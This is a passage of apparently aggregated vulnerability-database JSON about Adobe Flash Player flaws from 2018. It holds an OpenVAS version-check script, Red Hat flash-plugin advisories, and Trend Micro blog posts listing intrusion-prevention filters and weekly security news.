St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812718\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4871\");\n script_bugtraq_id(102465);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 15:13:18 +0530 (Wed, 10 Jan 2018)\");\n script_name(\"Adobe Flash Player Security Updates(apsb18-01)-Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an out-of-bounds\n read error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will lead to information exposure.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 28.0.0.137 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.137 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.137\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2022-11-18T18:35:33", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 29.0.0.113.\n\nSecurity Fix(es):\n\n* flash-plugin: Use After Free - remote code execution vulnerability (APSB18-05) (CVE-2018-4919)\n\n* flash-plugin: Type Confusion - remote code execution vulnerability (APSB18-05) (CVE-2018-4920)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-14T14:23:40", "type": "redhat", "title": "(RHSA-2018:0520) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2018-06-07T14:21:40", "id": "RHSA-2018:0520", "href": "https://access.redhat.com/errata/RHSA-2018:0520", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T20:40:17", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 28.0.0.161.\n\nSecurity Fix(es):\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player. These vulnerabilities, detailed in the Adobe Security Bulletin listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to crash, execute arbitrary code, or disclose sensitive information when the victim loaded a page containing the malicious SWF content. (CVE-2018-4877, CVE-2018-4878)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-07T17:47:53", "type": "redhat", "title": "(RHSA-2018:0285) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2018-06-07T14:21:50", "id": "RHSA-2018:0285", "href": "https://access.redhat.com/errata/RHSA-2018:0285", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T19:30:33", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 28.0.0.137.\n\nSecurity Fix(es):\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player. These vulnerabilities, detailed in the Adobe Security Bulletins listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to disclose sensitive information or modify its settings when the victim loaded a page containing the malicious SWF content. (CVE-2017-11305, CVE-2018-4871)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-10T20:44:27", "type": "redhat", "title": "(RHSA-2018:0081) Important: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11305", "CVE-2018-4871"], "modified": "2018-06-07T14:21:41", "id": "RHSA-2018:0081", "href": "https://access.redhat.com/errata/RHSA-2018:0081", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "trendmicroblog": [{"lastseen": "2018-03-23T15:44:34", "description": "![](https://blog.trendmicro.com/wp-content/uploads/2017/08/TippingPoint-300x205.jpg)\n\nBack in 2005, there were a number of us in a conference room in Austin, Texas working to determine how we would structure it, what we would name it, and how to deal with the potential backlash that would come after we announced it. What is it? I\u2019m referring to our Zero Day Initiative. It\u2019s been a long journey for the team working to gain the trust of not only vendors in various industries, but also the security researcher community. By promoting responsible disclosure of vulnerabilities, the Zero Day Initiative (ZDI) has grown to become a significant influencer on the importance of security in the product development lifecycle and a deterrent to the black market.\n\nIn addition to being the largest bug bounty program in the world, the ZDI is also the leader in global vulnerability research and discovery. Frost & Sullivan\u2019s report, \u201c[Analysis of the Global Public Vulnerability Research Market, 2017](<https://www.trendmicro.com/content/dam/trendmicro/global/en/business/products/network/integrated-atp/vulnerability-tracker-feb-2018.pdf>),\u201d highlights the vulnerability landscape and the key public vulnerability reporting agencies. Out of the 1,522 vulnerabilities counted in the report, the ZDI publicly disclosed 66.3% of them! For more information on ZDI and statistics from the report, download this [infographic](<https://www.trendmicro.com/content/dam/trendmicro/global/en/business/products/network/zdi-infographic-2018.pdf>).\n\n**Adobe Security Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe updates released on or before March 13, 2018. The following table maps Digital Vaccine filters to the Adobe updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [March 2018 Security Update Review](<https://www.zerodayinitiative.com/blog/2018/3/13/the-march-2018-security-update-review>) from the Zero Day Initiative:\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|---|--- \nAPSB18-05 | CVE-2018-4919 | 30701 | \nAPSB18-05 | CVE-2018-4920 | 30699 | \n \n \n\n**Planned Maintenance Window**\n\nThe Trend Micro TippingPoint Threat Management Center (TMC) web site (<https://tmc.tippingpoint.com>) will be undergoing maintenance on the following date and time:\n\n**Date** | **From** | **To** \n---|---|--- \nSunday, April 8, 2018 | 9:00AM (CDT) | 10:00AM (CDT) \n2:00PM (UTC) | 3:00PM (UTC) \n \n \n\nDuring the maintenance window, the Security Management System (SMS), Intrusion Prevention System (IPS), Next Generation Firewall (NGFW) and Threat Protection System (TPS) connectivity to the TMC will be disrupted, thus preventing the Digital Vaccine (DV), Threat Digital Vaccine (ThreatDV), Reputation Security Monitor (RepSM) and TippingPoint Operating System (TOS) updates from occurring. Customers with any questions or concerns can [contact](<https://tmc.tippingpoint.com/TMC/Support?parentFolderId=support&contentId=Support_Contacts>) the TippingPoint Technical Assistance Center.\n\n**Zero-Day Filters**\n\nThere are 22 new zero-day filters covering 10 vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_AlienVault (1)_**\n\n| \n\n * 30685: HTTPS: AlienVault USM and OSSIM get_directive_kdb.php SQL Injection Vulnerability (ZDI-16-505) \n---|--- \n| \n \n**_Apple (4)_**\n\n| \n\n * 30810: ZDI-CAN-5812: Zero Day Initiative Vulnerability (Apple Safari)\n * 30815: PWN2OWN ZDI-CAN-5819: Zero Day Initiative Vulnerability (Apple Safari)\n * 30820: ZDI-CAN-5825: Zero Day Initiative Vulnerability (Apple Safari)\n * 30821: PWN2OWN ZDI-CAN-5827: Zero Day Initiative Vulnerability (Apple Safari) \n---|--- \n| \n \n**_EMC (2)_**\n\n| \n\n * 30718: TCP: EMC AutoStart ftagent Opcode 20 Subcode 2219 Command Execution Vulnerability (ZDI-15-172)\n * 30720: TCP: EMC AutoStart ftagent Opcode 20 Subcode 2060 Command Execution Vulnerability (ZDI-15-171) \n---|--- \n| \n \n**_Hewlett Packard Enterprise (2)_**\n\n| \n\n * 30695: HTTPS: HPE Vertica validateAdminConfig Command Injection Vulnerability (ZDI-16-244)\n * 30738: HTTP: HP Sprinter ActiveX Instantiation Buffer Overflow Vulnerability(ZDI-14-359) \n---|--- \n| \n \n**_Microsoft (2)_**\n\n| \n\n * 30811: PWN2OWN ZDI-CAN-5814: Zero Day Initiative Vulnerability (Microsoft Edge)\n * 30812: PWN2OWN ZDI-CAN-5815: Zero Day Initiative Vulnerability (Microsoft Edge) \n---|--- \n| \n \n**_Mozilla (2)_**\n\n| \n\n * 30817: PWN2OWN ZDI-CAN-5822: Zero Day Initiative Vulnerability (Mozilla Firefox)\n * 30818: ZDI-CAN-5824: Zero Day Initiative Vulnerability (Mozilla Firefox) \n---|--- \n| \n \n**_Oracle (2)_**\n\n| \n\n * 30722: HTTP: Oracle Data Quality Trillium Based SetEntities Type Confusion Vulnerability (ZDI-15-105)\n * 30724: HTTP: Oracle Data Quality LoaderWizard DataPreview Type Confusion Vulnerability (ZDI-15-103) \n---|--- \n| \n \n**_Panasonic (2)_**\n\n| \n\n * 30726: HTTP: Panasonic Security API SDK ActiveX FilePassword Memory Corruption Vulnerability (ZDI-15-260)\n * 30742: HTTP: Panasonic Security API SDK Buffer Overflow Vulnerability (ZDI-15-261) \n---|--- \n| \n \n**_Schneider Electric (4)_**\n\n| \n\n * 30709: HTTP: Schneider Electric ProClima F1BookView Buffer Overflow Vulnerability (ZDI-15-634)\n * 30714: HTTP: Schneider Electric ProClima F1BookView CopyRangeEx Memory Corruption Vulnerability(ZDI-15-629)\n * 30715: HTTP: Schneider Electric ProClima F1BookView AttachToSS Memory Corruption Vulnerability (ZDI-15-628)\n * 30716: HTTP: Schneider Electric ProClima F1BookView CopyRange SwapTables Memory Corruption (ZDI-15-627) \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 30684: HTTPS: Trend Micro Control Manager task_controller Information Disclosure Vulnerability (ZDI-16-462) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-march-12-2018/>).\n\nThe post [TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of March 19, 2018](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-march-19-2018/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2018-03-23T15:05:44", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of March 19, 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2018-03-23T15:05:44", "id": "TRENDMICROBLOG:611E1E590AEA0D73DBB760324065E09C", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-march-19-2018/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-02-09T18:09:23", "description": "![](https://blog.trendmicro.com/wp-content/uploads/2017/08/TippingPoint-300x205.jpg)\n\nIt was a busy week in the cyber security world, but it shouldn\u2019t be surprising given that the 2018 Winter Olympics in Pyeongchang have begun. I shouldn\u2019t blame just the Olympics, but it\u2019s hard not to given the international focus, controversy around the ban of certain athletes and its proximity to a certain country. So let\u2019s jump right in\u2026\n\n**Adobe Flash Player**\n\nEarlier this week, Adobe released a critical security update for a pair of vulnerabilities in Flash Player, one of which has been actively exploited in phishing attacks attributed to North Korean APT actor Group 123. Both bugs are classified as use-after-free vulnerabilities that can result in remote code execution. The vulnerability that is being actively exploited (CVE-2018-4878) was found by Kr-CERT/CC, South Korea's national computer emergency response team. The other vulnerability (CVE-2018-4877) came through our Zero Day Initiative via \"bo13oy\" of Qihoo 360's Vulcan Team.\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for the Adobe Flash vulnerabilities. The following table maps Digital Vaccine filters to the Adobe updates:\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|---|--- \nAPSB18-03 | CVE-2018-4877 | 30346 | \nAPSB18-03 | CVE-2018-4878 | 30343 | \n \n \n\n**WordPress \u201cload-script\u201d Usage Vulnerability**\n\nOn Tuesday, we released DVToolkit CSW file CVE-2018-6389.csw for the WordPress \u201cload-script\u201d usage vulnerability. This filter detects usage of load-scripts.php in WordPress. The load-scripts.php is a built-in script in WordPress that processes user-defined requests. Due to insufficient validation, any user can send large amounts of requests for processing which could cause system resource exhaustion and result in a denial-of-service condition. User authentication is not required to exploit this vulnerability. Customers using TippingPoint solutions should note that the CSW filter will be obsoleted by DV filter 30356.\n\n**Cisco ASA WebVPN Host Scan Memory Corruption Vulnerability**\n\nWe also released DVToolkit CSW file CVE-2018-0101.csw for the Cisco ASA WebVPN Host Scan Memory Corruption Vulnerability. This filter detects an attempt to exploit a memory corruption vulnerability in the Cisco Adaptive Security Appliance (ASA). The specific flaw is due to a failure to properly allocate memory when parsing the host-scan-reply tag. An attacker can leverage this vulnerability to execute arbitrary code in the context of the process. Authentication is not required to exploit this vulnerability. Customers using TippingPoint solutions should note that the CSW filter will be obsoleted by DV filter 30369.\n\n**Zero-Day Filters**\n\nThere are 11 new zero-day filters covering five vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Foxit (6)_**\n\n| \n\n * 30318: ZDI-CAN-5312: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30319: ZDI-CAN-5370,5372: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30333: ZDI-CAN-5371: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30335: ZDI-CAN-5373: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30337: ZDI-CAN-5374: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30338: ZDI-CAN-5375: Zero Day Initiative Vulnerability (Foxit Reader) \n---|--- \n| \n \n**_Hewlett Packard Enterprise (2)_**\n\n| \n\n * 30308: HTTP: HPE Moonshot Provisioning Manager Appliance khuploadfile.cgi Directory Traversal (ZDI-18-001)\n * 30309: HTTPS: HPE Moonshot Provisioning Manager Appliance khuploadfile.cgi Directory Traversal (ZDI-18-001) \n---|--- \n| \n \n**_Microsoft (1)_**\n\n| \n\n * 30330: ZDI-CAN-5369: Zero Day Initiative Vulnerability (Microsoft Internet Explorer) \n---|--- \n| \n \n**_Quest (1)_**\n\n| \n\n * 28124: HTTP: Quest NetVault Backup Multipart Request Header Buffer Overflow Vulnerability (ZDI-18-004) \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 30311: HTTPS: Trend Micro Mobile Security for Enterprise SQL Injection (ZDI-17-782) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-january-29-2018/>).", "cvss3": {}, "published": "2018-02-09T16:55:38", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of February 5, 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-0101", "CVE-2018-4877", "CVE-2018-4878", "CVE-2018-6389"], "modified": "2018-02-09T16:55:38", "id": "TRENDMICROBLOG:08ADD009C78AC2B7B49C47D2673AD447", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-february-5-2018/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-02-18T14:50:25", "description": "![](https://blog.trendmicro.com/wp-content/uploads/2017/08/NEW_Security_News_Icon_300x205_03-300x205.jpg)\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, North Korean hackers overtook Adobe, Trend Micro Safety Solutions discovered new a botnet, and the threat of third-party cyber breaches made large corporations rethink their strategy.\n\nRead on to learn more.\n\n \n\n \n\n[**Winter Olympics\u2019 Security on Alert, but Hackers Have a Head Start**](<https://www.nytimes.com/2018/02/08/technology/winter-olympics-hackers.html>)\n\n_The Department of Homeland Security is warning Americans planning to attend the 2018 Winter Olympic Games in Pyeongchang that cybercriminals are likely to be targeting the Games._\n\n[**Malicious Chrome Extensions Found in Chrome Web Store, Form Droidclub Botnet**](<https://blog.trendmicro.com/trendlabs-security-intelligence/malicious-chrome-extensions-found-chrome-web-store-form-droidclub-botnet/>)\n\n_The Trend Micro Cyber Safety Solutions team has discovered a new botnet delivered via Chrome extensions that affect hundreds of thousands of users._** **\n\n[**Detecting New Threats via Contextual Information and Reputation**](<https://blog.trendmicro.com/trendlabs-security-intelligence/xgen-detection-new-threats/>)\n\n_How the increase in adoption of polymorphism and packing has made traditional signature-based detection at the client side (endpoint) obsolete._** **\n\n[**How hackers recycle top threats**](<https://blog.trendmicro.com/how-hackers-recycle-top-threats/>)\n\n_According to Trend Micro's 2018 report, experts forecast that infection techniques like those used to spread email and web-based spam will resurface in connection with the fake news triangle. _\n\n[**North Korean Hackers Allegedly Exploit Adobe Flash Player Vulnerability (CVE-2018-4878) Against South Korean Targets**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/north-korean-hackers-allegedly-exploit-adobe-flash-player-vulnerability-cve-2018-4878-against-south-korean-targets>)\n\n_The South Korean Computer Emergency Response Team (KR-CERT) warned of a zero-day vulnerability in Adobe Flash player that could be maliciously exploited. _\n\n[**Uber says hackers behind 2016 data breach were in Canada, Florida**](<https://www.reuters.com/article/us-uber-cyber-congress/uber-says-hackers-behind-2016-data-breach-were-in-canada-florida-idUSKBN1FQ2YO>)\n\n_John Flynn testified to a U.S. congressional committee on February 6th. Uber had disclosed the breach of 57 million worldwide users in November, about a year after it occurred._\n\n[**These industries are the most vulnerable to data breaches in the United States**](<https://www.sharefile.com/blog/top-industries-affected-by-data-leaks-in-2017/>)\n\n_According to Citrix ShareFile\u2019s research, healthcare is the most vulnerable industry to data breaches, with 328 leaks (nearly 60% of all leaks in 2017) at an estimated cost of almost $1.2 billion. _\n\n[**How artificial intelligence is unleashing a new type of cybercrime**](<https://www.techrepublic.com/article/how-artificial-intelligence-is-unleashing-a-new-type-of-cybercrime/>)\n\n_Rather than hiding behind a mask to rob a bank, criminals are now hiding behind artificial intelligence to do their attack. However, financial institutions can use AI as well to combat these crimes._\n\n[**Third party cyber breach risk set to rise**](<http://www.computerweekly.com/news/252434580/Third-party-cyber-breach-risk-set-to-rise>)\n\n_Third party cyber security risk should always have been a priority, but this has never been more important than it is now in light of new technology risks and data protection regulations._\n\nDid any of these articles stand out to you? Let me know your thoughts below, or follow me on Twitter; [@JonLClay.](<https://twitter.com/jonlclay>)", "cvss3": {}, "published": "2018-02-09T14:00:56", "type": "trendmicroblog", "title": "This Week in Security News: Botnets and Breaches", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-4878"], "modified": "2018-02-09T14:00:56", "id": "TRENDMICROBLOG:D07F262A5F92BE131EF59AA1DD863465", "href": "https://blog.trendmicro.com/week-security-news-botnets-breaches/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-09T14:52:04", "description": "![](https://blog.trendmicro.com/wp-content/uploads/2018/03/Week-in-Security-News-Logo_RGB-300x300.jpg)\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, the U.S. official in charge of election security was replaced, Trend Micro hosted a tea party in rural Taiwan, and a new cryptocurrency minor was discovered through an Oracle patch.\n\nRead on to learn more.\n\n[**2017 Mobile Threat Landscape**](<https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/2017-mobile-threat-landscape>)\n\n_If mobile threats _[_diversified and expanded in 2016_](<https://blog.trendmicro.com/trendlabs-security-intelligence/2016-mobile-threat-landscape/>)_, they matured in 2017. Mobile ransomware continued to rear its head, burgeoning into the platform\u2019s most prevalent threat. Simple screenlockers, for instance, evolved into file-encrypting malware, some of which __even seemed to keep pace with their desktop counterparts in terms of malicious routines. _\n\n[**A Look Into the Most Noteworthy Home Network Security Threats of 2017**](<https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/a-look-into-the-most-noteworthy-home-network-security-threats-of-2017>)\n\n_Routers are the gateways to all internet-connected devices in homes. They could also be potentially welcoming a bevy of home network threats risking users\u2019 information and security. Here we review the most noteworthy home network security events of 2017._\n\n[**5 Cybersecurity Trends to Watch in 2018**](<https://www.inc.com/james-paine/dont-miss-these-5-cyber-security-trends-in-2018.html>)\n\n_Inc. contributor, James Paine, sums up his top five trends to watch in cybersecurity: AI/machine learning, proactivity and preparation, GDPR, late adopters and talent shortages._\n\n[**New Campaign Exploits CVE-2018-4878 Anew via Malicious Microsoft Word Documents**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/new-campaign-exploits-cve-2018-4878-anew-via-malicious-microsoft-word-documents>)\n\n_On February 6, Adobe released a security update in Flash version 28.0.0.161 meant to address _[_CVE-2018-4878_](<https://nvd.nist.gov/vuln/detail/CVE-2018-4878>)_, _[_a zero-day remote code execution vulnerability in Adobe Flash Player_](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/north-korean-hackers-allegedly-exploit-adobe-flash-player-vulnerability-cve-2018-4878-against-south-korean-targets>)_ that attackers exploited through the use of lure documents sent to victims via phishing emails. _\n\n[**OMG Mirai Variant Turns IoT Devices Into Proxy Servers**](<https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/omg-mirai-variant-iot-devices-proxy-servers>)\n\n_A new Mirai variant, dubbed as OMG (detected by Trend Micro as ELF_MIRAI.AUSX), was found targeting Internet of Things (IoT) devices and turning them into proxy servers. _\n\n[**A Tea Party with a Difference: Trend Micro Supports Arts and Cultural Education in Rural Taiwan**](<https://blog.trendmicro.com/tea-party-difference-trend-micro-supports-arts-cultural-education-rural-taiwan/>)\n\n_CCO and Trend Micro and Chairman of Trend Micro Education Foundation recently went to a Taiwanese elementary school to raise funds to support its traditional Chinese orchestra._\n\n[**Exclusive: U.S. official focused on election security will be replaced**](<https://www.reuters.com/article/us-usa-cyber-election-masterson-exclusiv/exclusive-u-s-official-focused-on-election-security-will-be-replaced-idUSKCN1G62NI.>)\n\n_The head of a federal commission who has helped U.S. states protect election systems from possible cyber-attacks by Russia or others is being replaced. _\n\n[**46% of Orgs Never Change Cybersecurity Strategy, Even After Attack Or Breach**](<https://www.techrepublic.com/article/46-of-orgs-never-change-cybersecurity-strategy-even-after-attack-or-breach/>)\n\n_Despite an increasingly sophisticated cyber threat landscape, some 46% of 1,300 IT professionals and business leaders surveyed said that their organization's security strategy rarely changes._\n\n[**VPN 101 \u2013 Part 1: What You Need to Know to Stay Safe and Protect Your Privacy Online**](<https://blog.trendmicro.com/vpn-101-part-1-need-know-stay-safe-protect-privacy-online/>)\n\n_Trend Micro\u2019s local VPN in Content Shield\u2014part of Trend Micro Mobile Security for iOS\u2014focuses on web threat and web content filtering._\n\n[**Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads**](<https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerability-exploited-deliver-double-monero-miner-payloads/>)\n\n_A patched Oracle WebLogic WLS-WSAT is being abused to deliver two different cryptocurrency miners: a 64-bit variant and a 32-bit variant of an XMRig Monero miner._\n\n[**Cryptocurrency-Mining Malware: 2018\u2019s New Menace?**](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-malware-2018-new-menace/>)\n\n_The popularity and increasing real-world significance of cryptocurrencies are also drawing cybercriminal attention \u2014 so much so that it appears to keep pace with ransomware\u2019s infamy in the threat landscape._\n\n[**Intel's Spectre fix for Broadwell and Haswell chips has finally landed**](<http://www.zdnet.com/article/intels-spectre-fix-for-broadwell-and-haswell-chips-has-finally-landed/>)\n\n_Intel has released new microcode updates to address the Spectre Variant 2 flaw._\n\n[**Why Cybersecurity Is About More Than Prevention-Focused Products**](<https://www.forbes.com/sites/forbestechcouncil/2018/02/28/why-cybersecurity-is-about-more-than-prevention-focused-products/#51ac412e7408>)\n\n_Forbes Tech Council member Brian NeSmith shares tips on how to beef up cybersecurity._\n\n[**Cyber 'Shark', Robert Herjavec, Advocates Maintaining 'Cyber-Hygiene' For Businesses (Part 1)**](<https://www.forbes.com/sites/andrewrossow/2018/02/28/cyber-shark-robert-herjavec-advocates-maintaining-cyber-hygiene-for-businesses-part-1/#2b3cd716d8da>)\n\n_Forbes sits down for an interview with cyber security guru and entrepreneur thought leader, Robert Herjavec, to discuss the state of the cybersecurity industry today._\n\nDid any of these articles teach you something? Let me know your thoughts below, or follow me on Twitter: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Trends and Tea Parties](<https://blog.trendmicro.com/week-security-news-trends-tea-parties/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2018-03-02T14:35:07", "type": "trendmicroblog", "title": "This Week in Security News: Trends and Tea Parties", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-4878"], "modified": "2018-03-02T14:35:07", "href": 